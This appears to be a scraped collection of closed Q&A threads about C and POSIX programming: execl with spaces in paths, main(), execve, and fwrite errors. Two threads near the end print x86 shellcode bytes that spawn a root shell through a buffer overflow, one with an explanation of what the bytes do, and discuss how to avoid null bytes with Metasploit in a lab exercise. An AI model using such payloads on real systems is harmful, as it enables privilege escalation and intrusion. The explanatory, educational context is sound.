Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 8 years ago.
The first parameter of execl is the path of the executable file. My question is: what if there is a space in the path?
My program fails when a space exists.
what if there is a space in the path?
It does not matter, as the exec*() functions do not involve a shell or any kind of command interpreter which might choke on the space, or any other special character.
My program fails when space exists.
Does exec() return? Which value do you find in errno or what does perror() print?
exec(....); /* exec*() functions do not return if successful. */
perror("exec() failed");
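An added example, not part of the original answer, that exercises the point above: execl() is given a path whose directory and file names both contain spaces, and perror() reports errno only when execl() returns. It assumes a POSIX system with /bin/sh and a writable /tmp; the function names run_sh_at and demo_space_in_path are hypothetical.

```c
#define _XOPEN_SOURCE 700   /* mkdtemp(), symlink() */
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork, then execl() `path` directly (no shell parses it) as: sh -c "exit 7".
 * Returns the child's exit status: 7 if the exec worked, 127 if execl()
 * returned (failure, errno reported by perror), -1 on fork/wait errors. */
int run_sh_at(const char *path)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* First parameter: file to execute. Second: argv[0] for the new program. */
        execl(path, "sh", "-c", "exit 7", (char *)NULL);
        perror("execl() failed");   /* reached only if execl() returned */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed sample: a symlink to /bin/sh whose directory and file names
 * both contain spaces, created under /tmp and removed afterwards. */
int demo_space_in_path(void)
{
    char dir[] = "/tmp/exec space XXXXXX";
    char link[64];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(link, sizeof link, "%s/my shell", dir);
    if (symlink("/bin/sh", link) != 0) {
        rmdir(dir);
        return -1;
    }
    int rc = run_sh_at(link);
    unlink(link);
    rmdir(dir);
    return rc;
}

int main(void)
{
    printf("path with spaces -> exit %d\n", demo_space_in_path());
    printf("nonexistent path -> exit %d\n", run_sh_at("/no such dir/sh"));
    return 0;
}
```

The second call prints "execl() failed: No such file or directory" on stderr, which is the kind of errno detail the answer asks the poster to report.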
Closed 4 years ago.
I just had a question: whenever I write code, I have to call all functions (predefined or user-defined) in order to use or execute them. So why don't we have to call the main function?
The main function is defined by the language itself as the designated start of the program. You don't need to call it because, in effect, your operating system (Linux, macOS, Windows, etc.) does.
Closed 6 years ago.
Let's say that at some point in my program I am using execv and the function ran successfully. Now my program has changed. What happened to it exactly? (Does all the memory get wiped automatically?)
execve() does not return on success, and the text, data, bss, and stack of the calling process are overwritten by that of the program loaded.
That is to say, all data of the current process will be gone, and the new program is loaded into memory, replacing the original process.
Closed 7 years ago.
What happens to fwrite if the drive is full? Assuming that it was compiled on a Windows machine with Visual Studio.
Thanks!
If a write cannot be performed, fwrite() either returns a short item count (if some items have been written before an error occurred) or 0. fwrite() does not block if an error occurs. To differentiate an end-of-file condition from an IO error, use the feof() and ferror() functions.
Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 8 years ago.
I am calling a shellcode using buffer overflow to spawn a root shell. Can somebody explain what this shellcode exactly does? I have tried different shellcodes to spawn a root shell, but this was the only one which worked for me.
\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd
\x80
At first glance, the code appears to do setuid(0), then setgid(0), then call sys_execve() on some values (which include ASCII codes for "/bin//sh").
Looks like this is pure "payload" code, since I don't see anything to ensure the code is executed in the first place (buffer overflow, stack smashing, etc.).
(Thanks to #Hans Lub for the disassembler link)
Closed 8 years ago.
In a client server program I have to try a buffer overflow attack for a lab exercise. I need to pass a shell code with the input string to the server program. In the shell code there are some values as \x00 but the server terminates the string as soon as it reads \x00.
My shell code is like this:
\x55\x48\x89\xe5\x48\x83\xec\x20\xc7\x45\xe0\x59\x6f\x75\x20\xc7\x45\xe4\x6c\x6f
\x73\x65\x66\xc7\x45\xe8\x21\xba\x98\x0e\x40\x00\xb8\x09\x0e\x40\x00\x48\x89\xd6
My server terminates the string as soon as it sees \x00.
Please suggest a way to overcome this.
You can't pass shellcode that contains a null character to your application, as you mentioned. You should change your shellcode. If I remember correctly, you can tell Metasploit not to generate specific characters while generating shellcode (in your case, the null character).